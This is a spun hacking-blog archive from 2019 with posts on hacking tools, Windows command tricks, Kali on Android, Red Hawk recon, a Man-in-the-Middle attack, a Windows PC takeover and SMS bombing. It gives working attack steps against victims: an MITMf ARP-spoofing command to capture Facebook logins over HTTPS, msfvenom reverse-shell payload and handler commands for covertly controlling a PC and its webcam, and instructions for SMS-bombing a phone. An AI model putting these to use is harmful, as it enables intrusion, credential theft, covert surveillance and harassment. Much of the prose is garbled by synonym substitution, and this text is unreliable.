Tuesday, June 4, 2019

Top 10 Hacking Tools in 2019
Hacking Tools

Hacking Tools are programs or a script that help you find exploit weakness in PC frameworks, web applications, servers, systems and networks. There is an assortment of such tools accessible or available in the market. Some of them are open source while others are business solution.In this rundown we feature the main 10 instruments for Ethical Hacking of web applications, servers,  systems and networks.

Metasploit
Metasploit-penetration-testing-software

Metasploit is a major tool frequently utilized for numerous reasons. Give me a chance to be progressively exact, this isn't only a tool, however a giant structure for all hacking destinations.

Its best-known sub-venture is the open-source Metasploit Framework, a tool for creating and executing endeavor code against a remote target machine. Other significant sub-ventures incorporate the Opcode Database, shell code archive and related research. Metasploit is pre-introduced in the Kali Linux working framework

It is a multi-highlight situated structure wherein you can see 'n' number of exploits for WindowsAndroid,  Websites and other hacking-related. Additionally, it do that, yet you can utilize it for reconnaissance as well.


Sqlmap
sqlmap-exploit-database-vulnerabilities

Sqlmap is another significant tool with regards to SQL injection assaults. This tool help you hacking into websites conceivably powerless against SQL injection vulnerabilities

This can be utilized to successfully discover database, look for tables, columns and at long last information tuples. Its exceptionally simple and simply direction thing which you have to recollect. It really takes every necessary step more straightforward which would have been much monotonous something else.
Nmap or Network Mapper
Nmap-port-scanning-tool

NMAP is a broadly utilized device for surveillance stage. It is best with regards to port checking, examining for services on target have, working framework utilized by the target. So it helps a great deal during data gathering stage.

It additionally permits to perform assaults on ftp or different services utilizing records or dictionary.This is a helpful tool and presumably again an absolute necessity have for a hacker.

Read Also : NMAP Tutorial : How to use Nmap from Basic to Advanced

Aircrack-ng

Aircrack-ng WiFi network security

Here comes the huge name utilized by WiFi hackers. Indeed, in the event that you've at any point hacked into WiFi's you would likely think about this tool. Aircrack-ng is generally utilized for Wireless hacking targets.

The tool is in reality entirely adaptable and simple to utilize. This tool is accessible over every significant stage, yet utilizing it on Linux with a Wireless Adapter having screen mode ON, is only a magnificent encounter man! Aircrack-ng is a WiFi hacking tool.

It is in all respects generally utilized for WiFi hacking purposes. You will discover tool for assaulting, Pentesting, checking WiFi, and breaking. It can hack WPA/WPA2-PSK and WEP moreover.

Nessus 
Nessus-vulnerability-scanner-tool

Nessus is a special tool for weakness checking. This tool is solely utilized for checking different networks on IPv4, IPv6, and so on. 

Coming in different organizations, for example, Nessus Home, Nessus Manager, Nessus Cloud and Nessus Professional, it is a dynamic tool that can check numerous sort of vulnerabilities.


BurpSuite 
Burpsuite-web-application-penetration-testing

Burpsuite is a best tool I can say beyond any doubt for Web Application Penetration Testing. Trust me, there's not a lot worth than this with regards to basically discovering bugs.

It cutoff points to that, yet in addition offers a few cool expansion highlights like burp Intruder, repeater, scanner, extender, sequencer. Essentially it acts like an intermediary between your beginning traffic from internet browser to the web server working at back-end.

It comes in both free just as expert release. You should attempt this and take my statement you should have it in the event that you wanna be a fruitful bug seeker.
Acunetix 
Acunetix-web-application-vulnerability-scanner

Acunetix is a popular vulnerability scanner used for finding out bugs in the web applications. Acunetix is pretty much accurate when it comes to doing its job. You may try it out.

  1. Scan for all variations of SQL Injection, XSS, and 4500+ further vulnerabilities 
  2. Recognizes more than 1200 theme, and module vulnerabilities 
  3. Quick – slithers a huge number of pages while not interferences 
  4. Coordinates with well-loved WAFs and Issue Trackers to help inside the SDLC 
  5. Accessible On Premises and as a Cloud answer.

Ettercap 
Ettercap-man-in-the-middle-attack


Ettercap is a far reaching suite for man in the middle attack. It highlights sniffing of live connection, content filtering on the fly and numerous other fascinating traps.  

  1. It has a feature of ARP poison to sniff on an exchanged LAN between two hosts 
  2. Characters can be infused into a server or to a customer while keeping up a live connection.
  3. Ettercap is fit for sniffing a SSH association in full duplex.
  4. Permits making of custom modules utilizing Ettercap's API.

Netsparker

NETSPARKER-WEB-APPLICATION-SECURITY-SCANNER

Netsparker is a simple to utilize web application security scanner that can consequently discover SQL Injection, XSS and different vulnerabilities in your web applications and web administrations. It is accessible as on-premises and SAAS arrangement. 
  1. Dead precise vulnerability identification with the interesting Proof-Based Scanning Technology. 
  2. Insignificant arrangement required. Scanner naturally recognizes URL rewrite rules, custom 404 blunder pages. 
  3. REST API for consistent joining with the SDLC, bug tracking frameworks and so on. 
  4. Completely versatile arrangement. It will scan 1,000 web applications in only 24 hours.

Hashcat 

HASHCAT-Advanced-password-recovery

Hashcat is a powerful secret phrase splitting moral hacking apparatus. It can assist clients with recovering lost passwords, review secret key security, or simply discover what information is put away in a hash. 
  1. Multi-OS (Linux, Windows and MacOS)
  2. Multi-Platform (CPU, GPU, DSP, FPGA, etc., everything that comes with an OpenCL runtime)
  3. Multi-Hash (Cracking multiple hashes at the same time)
  4. Multi-Devices (Utilizing multiple devices in same system)
  5. Multi-Device-Types (Utilizing mixed device types in same system)
  6. Supports password candidate brain functionality
  7. Supports distributed cracking networks (using overlay)
  8. Supports interactive pause / resume
  9. Supports reading password candidates from file.

Monday, May 6, 2019

10 Useful Command Line tricks for Windows

With an interface as appealing as Windows 10's may be, it's anything but difficult to overlook that the OS accompanies a command line interface also. 

All things considered, you may have overlooked the Command Prompt, Microsoft hasn't, as it conveyed some extremely convenient enhancements to Command Prompt with Windows 10

While it's not as ground-breaking as its Unix partner, there are certainly a great deal of Command Prompt traps that can make it an extremely valuable tool to have. 

A great deal of things that the Command Prompt can give you a chance to do, are not in any case accessible in the GUI of the Windows OS, so it's unquestionably something you ought to utilize. In this article, we will impart to you, 10 Command Prompt traps that you should know: 


1. Encrypt Files utilizing Command Prompt 


The most valuable things that you can do utilizing the Command Prompt, is encoding your delicate information. 

Encryption is an approach to keep others from taking a look at your information, and it's an extremely significant piece of guaranteeing that your records are just yours. With this straightforward Command Prompt deceive, you can without much of a stretch encode documents on your Windows PC. 

Just launch the Command Prompt, and change your working index to the envelope where your documents are. This should be possible by utilizing the "cd" command. 


When no doubt about it, "cipher/E", and hit Enter. This will encrypt every one of the documents that were inside the folder. 

Note: If you attempt and open these encoded documents, they will open ordinarily for you, be that as it may, some other user won't almost certainly see the records, except if they sign in utilizing your record. So ensure that you have a secret phrase set. 

2. Change the Color of the CMD Window 


The Command Prompt window is somewhat dull, in it's default state, and it doesn't generally look engaging, or anything uncommon. 

Be that as it may, this basic order will give you a chance to change the background and text color of the cmd window. 

Launch the cmd window, and type "color 02". 



Hit Enter, and you will see the Command Prompt window utilize a dark foundation with green content. 

3. Change the Prompt Text in Command Prompt 


When you first open Command Prompt, the default content of the brief is exhausting. 

It reflects the present working catalog that the client is in, yet it beyond any doubt could utilize some customization. 

In the event that you might want the brief in your cmd window to state an option that is other than the default, you can utilize the accompanying trap. 

Launch the Command Prompt, and type "brief" trailed by the content that you need. 

Ensure you include "$G" as far as possible, to guarantee that there is dependably the ">" sign toward the finish of the brief, what's more, you know where your order starts at. 



Hit Enter, and you will see the brief in the cmd window change to your custom content. 

Note: There are some more alternatives like "$G" accessible, and you look at the whole rundown by composing "help brief". 

Additionally, you can reset the brief back to its unique state by basic composing "brief" and hitting Enter. 

4. Change the Title of the Command Prompt Window 


When you launch Command Prompt, you more likely than not seen that the title bar peruses "Command Prompt", or possibly "Administrator Command Prompt", 


At that point this "Launch Prompt" title isn't useful in any way. Luckily, you can change that as well. 

Open Command Prompt, and type "title", trailed by the content that you need the Title bar to peruse. 

Hit Enter, and you will see the Title of the cmd window change to the content that you entered. 


Note: The title changes back to "Command Prompt" when you quit cmd and relaunch it. 

5. Watch an ASCII Version of Star Wars: A New Hope 


This one is an exceptionally cool trap, that can give you a chance to watch an ASCII content variant of Star Wars: A New Hope, totally inside the order brief window. 

The strategy is exceptionally straightforward, and it utilizes Telnet. Essentially pursue the means underneath to watch Star Wars inside the cmd window. 



Dispatch Command Prompt, and type "telnet towel.blinkenlights.nl", and hit Enter.

6. Make a WiFi Hotspot 


You can likewise utilize the Command Prompt to make a WiFi hotspot on your Windows PC, and offer your internet connection with multiple gadgets, all without hosting to utilize any third party applications at all. To do this, simply pursue the means underneath: 

Launch Command Prompt, and type "netsh wlan set hostednetwork mode=allow ssid=HotspotName key=Password". Replace "HotspotName" with the name that you need for your WiFi hotspot, and replace "password" with the password you need to set. Hit enter. 


Next, type "netsh wlan begin hostednetwork" and hit Enter, and your WiFi hotspot will be communicated, and different gadgets will most likely interface with it. 

Note: If you need to quit broadcasting your WiFi hotspot, essentially utilize the command "netsh wlan stop hostednetwork". 

7. Hide Folders utilizing Command Prompt 


While there is a simple method to conceal folders on Windows by utilizing the properties pane of the folder and checking the checkbox that says "Hidden", the strategy isn't helpful as the folders concealed utilizing this technique can undoubtedly be seen whether the view choices are changed to "Show Hidden records and Folders", making it a truly pointless element.

However, utilizing this cmd deceive, you can hide your folders so that they will be totally covered up, and Explorer won't almost certainly show them by any means. Basically pursue the means delineated underneath: 

Launch Command Prompt, and explore to the registry where your objective folders dwells. 

Type "Attrib +h +s +r folder_name", supplanting the "folder_name" with the name of the folder that you need to stow away, and press Enter. 


You would now be able to watch that the envelope is to be sure covered up inside Windows Explorer and can not be seen by anybody. 

To unhide the folder, you can utilize the direction "Attrib - h - s - r folder_name". 

Note: Hidden folders e seen utilizing the cmd command  "dir/AH". 


8. Copy Command Output to Clipboard 


On the off chance that you have ever endeavored to copy stuff off the Command Prompt, you more likely than not understood that it is exceedingly troublesome, also un-natural. Be that as it may, with this straightforward deceive you can duplicate the yield of any order that you need, legitimately to your PC's clipboard, and you would then be able to glue it into any content tool that you need. 



Launch Command Prompt and type the command that you need to copy the yield for, trailed by "| clip". For instance, I'm utilizing the order "ipconfig | clip". Hit Enter, and you will see that the cmd window demonstrates no yield. 

Open a Text editor, for example, Notepad, and press Control + V, and you can essentially paste the output of the command directly inside Notepad.


9. Rundown all Installed Programs 


Another cool trap on the Command Prompt includes rattling off the majority of the projects that are introduced on your PC. This is especially useful on the off chance that you have to uninstall a program utilizing the Command Prompt. To drill down all the introduced projects, basically pursue the means laid out underneath: 

Launch Command Prompt, and type "wmic item get name". 


Hit Enter, and you will see a rundown of the considerable number of projects that are introduced on your PC. 

You can likewise utilize wmic to uninstall programs, straightforwardly from the cmd window. Essentially type "wmic item where "name like '%NAMEOFAPP%'" call uninstall/nointeractive" and hit Enter. Clearly, replace "NAMEOFAPP" with the name of the application that you need to uninstall from your PC. 


10. Open CMD Window Inside a Directory 


Let's be honest, the manner in which Windows handles changing registries utilizing the "change directory" order is fairly odd. Luckily, there is a straightforward method to open Command Prompt windows inside an index so you don't need to change catalogs. This is an extremely convenient trap, particularly if the envelopes you need to get to are covered somewhere inside the file system. To open a cmd window inside an index, simply pursue the means beneath: 

Open the index in Windows Explorer. In the location bar, type "cmd", and hit Enter. 


An order window will open inside the registry you had opened in Windows Explorer.

Wednesday, May 1, 2019

Linux Deploy & VNC Viewer - Install Kali Linux on Android Phone
Kali Linux is a standout operating system and especially for Hackers and ProgrammersInstalling Kali Linux on an Android gadget opens an assortment of highlights which incorporate running web based applications on your Android gadget, install and use Kali Linux applications, rather you can run a graphical work area condition on it. 

Linux Deploy & VNC Viewer - Install Kali Linux on Android Phone

Kali Linux has the capacity to transform an Android gadget into a compact system investigating or pen-testing gadget. 

While introducing Kali Linux on your Android gadget utilizing the strategies recorded beneath, you have to root your gadget. 

On the off chance that you don't wish to root your gadget, don't pursue the strategies recorded underneath. 

Another precautionary measure is to have enough free space in your memory

On the off chance that you don't have enough free memory, If you don’t have enough free memory, the installation if Kali Linux will fail.


Read Also: Trape Tool : How to Easily Track location using Kali Linux


1. Install Kali Linux Using Linux deploy and VNC Viewer. Download & install 
these two application in your phone.

Linux Deploy

VNC Viewer - Install Kali Linux on Android Phone


2. Once downloaded, dispatch the Linux deploy an application. You will discover an alternative resembling a download image at the bottom of the screen. Hit that choice, and you will discover a rundown of different alternatives. Here, in 'Distribution' select Kali Linux

Linux Deploy & VNC Viewer - Install Kali Linux on Android Phone


Note: Linux Deploy needs the root permission on your Android Device.Without root permission Kali Linux will not install in your phone.

Read Also: How to install Kali Linux on VMware Workstation

3. In a similar rundown, go to GUI settings and enter the width and the height of your gadget's screen. 

4. Then, go to the option 'Install' and hit it. You will see that the procedure of establishment has been started. This establishment procedure may take around 10 to 15 minutes. So please keep up your understanding till the procedure gets finished. 



5. When this procedure is finished, tap on the alternative 'Configure'. 

6. Post arrangement, hit the 'Start' alternative. 

7. Then, open the VNC viewer and enter the subtleties required, for example, address, name, and password, and so on. 

Linux Deploy & VNC Viewer - Install Kali Linux on Android Phone

8. Once the information section is finished, you will have effectively introduced Kali Linux on your Android gadget which is prepared to be utilized at this point.


Tuesday, April 30, 2019

Man in the Middle attack using MITM Framework in Kali Linux
MITM Is anybody there who knows anything about this? The majority of the site reveals to you How to do MITM in HTTP sites. am I correct? However, In this instructional exercise, You will figure out How to do Man In the Middle Attack on HTTPS and How Hacker sniff your own data like username, secret passwords, and so forth regardless of you are utilizing a high-security type site. 


The greater part of the general population ask me, How to do the assault on HTTPS sites? There are numerous tools of MITM which can change over a HTTPS demand into the HTTP and after that sniff the credentials. Numerous sites utilizing HSTS on their sites. 

Basically HSTS is a kind of security which ensures sites against convention downsize assaults and treat seizing sorts of assaults. We can sidestep HSTS sites moreover. 


Today, I will outline for you 

  1. Man In The Middle Framework 
  2. Introduce MITMF tool in your Kali Linux? 
  3. Bypass HSTS security websites? 
  4. How to be sheltered from these kinds of Attacks?

Man In The Middle Framework


Its a sort of Attack which is done just on the private system. You can't do this on Public Network. In this Attack, we set up MITMF in Kali.

Assume, an individual in a similar system surf Facebook.com then the parcel with a solicitation of facebook.com will go to the switch and afterward switch forward this solicitation to the Facebook server.

Be that as it may, If we set up MITMF in Kali then all the solicitation of the unfortunate casualty's PC which is heading off to the switch. MITMF can catch these all parcels and can peruse the information from these bundles. 

We can catch these all parcels utilizing MITMF and can likewise observe what is composed on those bundles. In the event that someone login to their facebook account, at that point we are likewise ready to see the username and secret key of that facebook account.

This is a pre-downloaded tool in Kali. So, you have to install this tool by typing

apt-get install mitmf

After downloading MITMF, type

MITMF -h

MITMF Attack

MITMF-h command is used to see all the commands of this tool.

To perform this MITM attack for bypassing HSTS. You need some IP’s as given below.

Requirements:

Victim’s IP: You can find victim’s IP by netdiscover command.
Router IP: Also shown by the netdiscover command.

To start MITM type

mitmf –spoof –arp -i eth0 –target ‘target IP’ –gateway ‘router’s IP’ –hsts


After typing the upper command you will see that Man In The Middle Attack is start on HSTS website also. To confirm this open your web browser and open facebook.com. Whenever you open facebook.com it opens facebook with a different URL like  it opens with webm.facebook.com with Not Secure.


Once your victim enters his/her email id and password then your mitmf will capture it. 


HOW TO BE SAFE FROM MITM? 

  1. Utilize Latest Operating Systems and Browsers 
  2. Utilize a trusted network while filling your delicate subtleties 
  3. Check SSL sign for every single site. 
  4. Use Data Encryption type software.


Thursday, April 25, 2019

Red Hawk - Information Gathering & Vulnerability Scanner Tool


Red Hawk is an open source tool that is utilized for data gathering and certain defenselessness checking. Red Hawk recognizes Content Management Systems (CMS) being used of an objective web application, IP address, web server record, Cloudflare data, and robots.txt information. 

Red Hawk can identify WordPress, Drupal, Joomla, and Magento CMS. Other checking highlights of Red Hawk incorporate WHOIS information gathering, Geo-IP query, Banner getting, DNS lookup, port examining, sub-area data and MX records query.  Red Hawk searches for blunder based SQL injection, WordPress delicate documents, and WordPress variant related vulnerabilities.

Recon and mapping out our objective is a key advance before we start to hack or adventure anything. This device robotizes this by observing what our focused on hand is running and if there are any adventures for it. Lets introduce it from our terminal and change to its registry, and after that run it.


Red Hawk Installation :


Red Hawk tool can be cloned from Github using the following command.

git clone https://github.com/Tuhinshubhra/RED_HAWK


After installing Red Hawk, move to the RED_HAWK directory and run rhawk.php file to launch the tool.

cd RED_HAWK
php rhawk.php


The command launches the tool and asks for the target web application. Upon providing the target web address, Red Hawk gives the information gathering and vulnerability scanning options as shown in the following screenshot.


Pick the ideal examining (or vulnerability assessment) alternative by composing the utility arrangement number in the activity field. The tools reacts by bringing results as indicated by the chose Red Hawk utility. For example, we can utilize essential web filtering by choosing its grouping number in the following format. 


Because of above activity, Red Hawk gets fundamental web data like webpage title, alloted IP address, web server innovation and form, cloudflare, and Robots.txt record.

So also, we can utilize Red Hawk to discover open ports and running administrations on the objective web applications.


Subscribe my News feed to get the most recent post Updates . 

Till Now Good Bye and Take Care.



Wednesday, April 24, 2019

How to hack a Windows PC on Your Network With Kali Linux
A controlled off Windows workstation can be undermined in under three minutes. With only a couple of keystrokes, it's workable for a hacker to expel all antivirus programming, make an indirect access, and catch webcam pictures and passwords, among other exceedingly touchy individual information. 

The inquiry you're presumably supposing right presently is the reason would a programmer do this on my PC? The appropriate response here is basic — there is an incentive in any sort of PC or online record, even your Facebook account. 


While many trust they don't have anything to lose or nothing to shroud, they ought not underestimate a programmer's capacity and reasons. By hacking into your Windows 10 PC, an assailant can transform it into a web server for phishing, malware, spam, and for lodging and circulating different detestable substance. 

They could likewise gather your contacts, spam others from your email, gain virtual merchandise, capture your notoriety, get all your record certifications, utilize your PC for bot movement, and substantially more.

So, before perusing this blog, read my past blog in which I tell you The best way To Hack Mobile Phone Using Termux. So also, You can hack windows by sending a payload to the injured individual's PC 


When the client introduces the payload your meterpreter session begins running and after that you do anything with the injured individual's PC. 

You can send this payload by means of social building and here loads of techniques present to send that payload to the unfortunate casualty's framework.

Step 1 :  Type msfvenom -p windows/meterpreter/reverse_tcp lhost=’Your Private IP’ lport=4444 -f exe -a x86 > hackming.exe
Hit enter and your payload for windows is ready. Your payload is present in the root folder. Now, transfer this payload to your victim’s PC.



Step 2:  After opening Metasploit. Just configure some settings. By typing

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost ‘Your Private IP’

set lport 4444

exploit



Now, install the payload to the victim’s system and then you see here you get meterpreter session. 

So, the victim’s system is hacked and now you can change and configure anything to this hack PC. But here, I will show you some commands of using it.

1. Sysinfo

To check the information of the system.


2. Screenshot

This command will capture a screenshot of the victim's Personal Computer.You can also try webcam_snap & webcam_stream for taking the pictures from victim device camera without knowing them.


3. Help 

It will show you many different commands which you can use an exploit.


It would be ideal if you given me a chance to perceive in the event that you discovered this post accommodating or not, leave a remark underneath on the off chance that you have any question and furthermore given me a chance to perceive another space you'd have an enthusiasm for perusing posts with respect to. 

Subscribe my News feed to get the most recent post Updates . 

Till Now Good Bye and Take Care.



SMS Bomber - How To Do SMS Bombing On Any Device
SMS Bomber - How To Do SMS Bombing On Any Device

Have you at any point thought whether you can send 1000's of messages to any cell phone? Aren't you eager to gain proficiency with this strategy for Bombardment of the messages? 

In this instructional exercise, I'm going to reveal to you a strategy by which you can do SMS Bombing by utilizing SMS Bomber. 


What is SMS Bombing?

SMS Bombing is sending boundless messages to a solitary portable number in the meantime secretly. We'll have the capacity to do this by utilizing a program known as SMS Bomber. 

What is SMS Bomber?

SMS Bomber is a content/programming that is utilized to send a downpour of SMS to the focused on versatile number.




The majority of the SMS Bombers are free. Thus, you can utilize any of them. Today I'm going to utilize a site which will give you both Online SMS Bombing and offline SMS Bombing by means of APK. Along these lines, open this site in your Browser by clicking here. 

In the wake of opening the site. At the top, you can see the alternative to send SMS in mass. Essentially, simply enter the nation code and telephone number to which you need to send SMS.

Alongside, you can see the choice in which you need to type the quantity of SMSes you need to send. For ex: You need to send 1000 messages at that point type 1000 there and on the off chance that you need to send 99 messages, at that point type 99 and Click on Start Bombing. 

Here you can see I've composed my versatile number and chose 15 messages to send. Now,as you can find in the accompanying picture, I have 15 messages on my portable number.





SMS Bomber Android Application

If you scroll down on this website you can see the option for downloading their app. Simply, download the app and Install.

SMS Bomber - How To Do SMS Bombing On Any Device


It is additionally simple to utilize this application. Basically, type the phone number and the quantity of messages you need to send and tap on BOMBIT.
At that point SMS will be sent to that portable number. 




You can utilize this application for a trick. Be that as it may, I suggest don't utilize this technique for unlawful purposes. In the event that you like this post, at that point do like and If you have any questions at that point do remark underneath.